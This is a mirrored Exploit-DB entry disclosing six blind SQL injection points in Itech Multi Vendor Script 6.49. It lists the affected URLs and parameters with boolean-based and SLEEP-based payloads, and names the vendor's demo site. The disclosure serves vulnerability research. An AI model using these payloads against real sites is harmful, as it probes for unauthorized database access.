bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41238.txt
Offensive Security 9ea9da7098 DB: 2017-02-04 
6 new exploits

APC UPS 3.7.2 - (apcupsd) Local Denial of Service
APC UPS 3.7.2 - 'apcupsd' Local Denial of Service

Microsoft Windows 7 / Server 2008R2 - Remote Kernel Crash
Microsoft Windows 7 / Server 2008 R2 - Remote Kernel Crash

Debian 9 ntfs-3g - Privilege Escalation

CUPS 1.1.x - .HPGL File Processor Buffer Overflow
CUPS 1.1.x - '.HPGL' File Processor Buffer Overflow
CUPS < 2.0.3 - Remote Command Execution
Netwave IP Camera - Password Disclosure

Itech Multi Vendor Script 6.49 - SQL Injection
Itech Multi Vendor Script 6.49 - 'pl' Parameter SQL Injection
SlimarUSER Management 1.0 - 'id' Parameter SQL Injection
Itech Multi Vendor Script 6.49 - SQL Injection
Zoneminder 1.29 / 1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery
2017-02-04 05:01:18 +00:00

77 lines
2.6 KiB
Text
Executable file
Raw Blame History

# Exploit Title : Itech Multi Vendor Script - Multiple SQL Injections
# Author : Yunus YILDIRIM (Th3GundY)
# Team : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website : http://www.yunus.ninja
# Contact : yunusyildirim@protonmail.com
# Vendor Homepage : http://itechscripts.com/
# Software Link : http://itechscripts.com/multi-vendor-shopping-script/
# Vuln. Version : 6.49
# Demo : http://multi-vendor.itechscripts.com
# # # # DETAILS # # # #
SQL Injections :
# 1
http://localhost/quickview.php?id=10
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=10 AND 9776=9776
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=10 AND SLEEP(5)
# 2
http://localhost/product.php?id=9
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9 AND 9693=9693
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=9 AND SLEEP(5)
# 3
http://localhost/product_search.php?search=Adidas
Parameter: search (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: search=Adidas%' AND SLEEP(5) AND '%'='
# 4
http://localhost/product_search.php?category_id=1
Parameter: category_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category_id=1 AND 8225=8225
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: category_id=1 AND SLEEP(5)
# 5
http://localhost/product_search.php?category_id=1&sub_category_id=1&sub_sub_category_id=1
Parameter: sub_sub_category_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND 7485=7485
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND SLEEP(5)
# 6
http://localhost/product_search.php?category_id=1&sub_category_id=1
Parameter: sub_category_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category_id=1&sub_category_id=1 AND 5242=5242
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: category_id=1&sub_category_id=1 AND SLEEP(5)
Reference in a new issue View git blame Copy permalink